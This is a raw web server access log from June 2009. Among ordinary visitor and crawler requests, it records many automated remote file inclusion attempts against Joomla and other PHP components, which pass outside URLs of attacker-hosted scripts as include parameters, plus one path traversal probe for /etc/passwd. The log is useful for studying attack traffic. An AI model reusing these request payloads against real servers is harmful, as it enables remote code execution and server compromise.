59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:56 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
60.51.124.240 - - [15/Jun/2009:01:11:58 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.71.54 - - [15/Jun/2009:01:11:58 -0400] "GET /images/index3_imp_air.jpg HTTP/1.1" 200 1763 "-" "Googlebot-Image/1.0"
95.154.216.25 - - [15/Jun/2009:01:12:10 -0400] "GET //include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../www??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
75.145.152.113 - - [15/Jun/2009:01:13:09 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:13:09 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:13:09 -0400] "GET /logs/access_log.Q109060800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:13:13 -0400] "GET /logs/access_log.Q109060100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:01:14:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.145.152.113 - - [15/Jun/2009:01:14:15 -0400] "GET /logs/access_log.Q109060800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:14:15 -0400] "GET /logs/access_log.Q109060100%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:01:17:15 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.23.158.226 - - [15/Jun/2009:01:17:21 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:17:21 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:17:21 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:17:33 -0400] "GET /logs/access_log.Q109052600//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:01:17:33 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:01:17:33 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:01:17:33 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
75.145.152.113 - - [15/Jun/2009:01:17:38 -0400] "GET /logs/access_log.Q109052800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.23.158.226 - - [15/Jun/2009:01:17:49 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
69.64.52.15 - - [15/Jun/2009:01:17:57 -0400] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.rollingdogranch.net/images/uploads/de/l333tbi1tX.txt????? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [15/Jun/2009:01:19:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [15/Jun/2009:01:20:43 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:01:20:43 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:01:20:43 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.203.180.144 - - [15/Jun/2009:01:20:48 -0400] "GET /logs/access_log.Q109052700/!scanhttp://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:20:48 -0400] "GET /!scanhttp://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:20:49 -0400] "GET /logs/access_log.Q109052700/!scanhttp://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:20:49 -0400] "GET /!scanhttp://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
65.23.158.226 - - [15/Jun/2009:01:21:01 -0400] "GET /logs/access_log.Q109052600//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:21:01 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:21:01 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:21:01 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:21:06 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
66.249.71.54 - - [15/Jun/2009:01:21:57 -0400] "GET /images/over-index_prp.jpg HTTP/1.1" 200 2940 "-" "Googlebot-Image/1.0"
211.203.180.144 - - [15/Jun/2009:01:22:05 -0400] "GET /logs/access_log.Q109052800/!scanhttp://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:22:05 -0400] "GET /logs/access_log.Q109052800/!scanhttp://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.34.167.192 - - [15/Jun/2009:01:22:50 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.808"
193.34.167.192 - - [15/Jun/2009:01:22:50 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
193.34.167.192 - - [15/Jun/2009:01:22:50 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.808"
75.155.180.12 - - [15/Jun/2009:01:23:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4 Public Beta Safari/528.16"
75.155.180.12 - - [15/Jun/2009:01:23:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4 Public Beta Safari/528.16"
209.59.12.99 - - [15/Jun/2009:01:24:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [15/Jun/2009:01:24:13 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:01:24:13 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:01:24:13 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.23.158.226 - - [15/Jun/2009:01:24:52 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:24:52 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:01:24:52 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
95.154.216.25 - - [15/Jun/2009:01:25:06 -0400] "GET //include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../www??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
211.203.180.144 - - [15/Jun/2009:01:25:15 -0400] "GET /logs/access_log.Q109052900/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 297 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:25:16 -0400] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 270 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:25:18 -0400] "GET /logs/access_log.Q109052900/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 297 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:25:19 -0400] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 270 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:25:40 -0400] "GET /logs/access_log.Q109051000/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 297 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.203.180.144 - - [15/Jun/2009:01:25:46 -0400] "GET /logs/access_log.Q109051000/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 297 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
65.23.158.226 - - [15/Jun/2009:01:25:49 -0400] "GET /logs/access_log.Q109052800//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
66.249.71.54 - - [15/Jun/2009:01:25:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109DD5482092B3003E1E067+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.150.9.236 - - [15/Jun/2009:01:26:01 -0400] "GET //main.php?basepath=http://www.brunoramalho.com/idpriv8.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
200.150.9.236 - - [15/Jun/2009:01:26:01 -0400] "GET /logs//main.php?basepath=http://www.brunoramalho.com/idpriv8.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
200.150.9.236 - - [15/Jun/2009:01:26:01 -0400] "GET /logs/access_log.Q109051100%20//main.php?basepath=http://www.brunoramalho.com/idpriv8.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
65.23.158.226 - - [15/Jun/2009:01:26:18 -0400] "GET /logs/access_log.Q109060100//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
193.34.167.192 - - [15/Jun/2009:01:26:28 -0400] "GET /logs/error_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
218.249.36.194 - - [15/Jun/2009:01:26:31 -0400] "GET /include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:01:26:31 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:01:26:31 -0400] "GET /logs/access_log.Q109050700/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:01:26:32 -0400] "GET /logs/access_log.Q109051700/include/mail.inc.php?skin_board_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.54.28.163 - - [15/Jun/2009:01:26:33 -0400] "GET /logs/access_log.Q109052400//component/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:01:26:38 -0400] "GET //component/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:01:26:43 -0400] "GET /logs//component/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
193.34.167.192 - - [15/Jun/2009:01:26:46 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://glassmac.com/bbs/data/roscanid.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
190.54.28.163 - - [15/Jun/2009:01:27:00 -0400] "GET /logs/access_log.Q109052400//component/option,com_virtuemart/Itemid,7/category_id,7/page,shop.browse//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.805"
206.225.92.50 - - [15/Jun/2009:01:27:01 -0400] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=../../../../../../../../etc/passwd HTTP/1.0" 404 253 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [15/Jun/2009:01:27:01 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 252 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
190.54.28.163 - - [15/Jun/2009:01:27:05 -0400] "GET //component/option,com_virtuemart/Itemid,7/category_id,7/page,shop.browse//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:01:27:11 -0400] "GET /logs//component/option,com_virtuemart/Itemid,7/category_id,7/page,shop.browse//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 316 "-" "libwww-perl/5.805"
210.112.121.225 - - [15/Jun/2009:01:27:51 -0400] "GET /logs//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:01:27:51 -0400] "GET /logs/error_log.Q109052000%20%20//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:01:27:51 -0400] "GET //plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:01:27:58 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.203.180.144 - - [15/Jun/2009:01:28:14 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
211.203.180.144 - - [15/Jun/2009:01:28:14 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
211.203.180.144 - - [15/Jun/2009:01:28:14 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
211.203.180.144 - - [15/Jun/2009:01:28:14 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
211.203.180.144 - - [15/Jun/2009:01:28:15 -0400] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 5572 "-" "libwww-perl/5.79"
211.203.180.144 - - [15/Jun/2009:01:28:15 -0400] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 5572 "-" "libwww-perl/5.79"
